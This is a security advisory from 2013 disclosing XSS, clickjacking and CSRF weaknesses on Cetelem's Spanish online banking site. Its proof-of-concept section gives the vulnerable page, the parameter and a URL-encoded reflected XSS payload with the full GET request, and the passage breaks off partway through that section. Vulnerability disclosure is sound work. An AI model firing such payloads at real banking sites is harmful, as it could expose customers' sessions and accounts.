=============================================================================================================================================================================================== CETELEM ON LINE BANK Cross Site Scripting ( and DOM Based XSS ) / Clickjacking: X-Frame-Options header missing / HTML form without CSRF protection =============================================================================================================================================================================================== TIME-LINE VULNERABILITY Multiples Advisories but Vendor not response 25-31 / 08 / 2013 Not Response ( Summer Time? ) 3-09-2013 Full Disclosure I. VULNERABILITY ------------------------- #Title: CETELEM ON LINE BANK DOM Based Cross Site Scripting ( and DOM Based XSS ) / Clickjacking: X-Frame-Options header missing / HTML form without CSRF protection #Vendor:httpS://www.cetelem.es/ #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es Twitter:@secnight II. DESCRIPTION ------------------------- Cetelem is a bank specializing in consumer lending (consumer credit, online credit and cards). Cetelem's main activity is the selling point funding, which accounts for 66.5% of its activity, which has more than 2,800 stores and more than 1,000 partners car dealers. The granting of credit cards, which represents 26% of its activity and now has about 500,000 active cards. The one major brands of BNP Paribas Personal Finance are: Cetelem (Argentina, Spain, France, Hungary, Portugal, Czech Republic, Romania, Russia, Slovakia) III. PROOF OF CONCEPT ------------------------- Cross site scripting ********************* Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Affected items /banco/creditos/unificacion-credito.jsp (2) " URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad=" The input is reflected inside a tag parameter between double quotes. GET /banco/creditos/unificacion-credito.jsp?hidAcuerdo=BCO_CONSO%22%20onmouseover%3dprompt%28999458%29%20bad%3d%22&loadParam=false Variant URL encoded GET input hidAcuerdo was set to BCO_CONSO" onmouseover=prompt(999458) bad=" LoadParam URL encoded GET input loadParam was set to false_930312():;922135 The input is reflected inside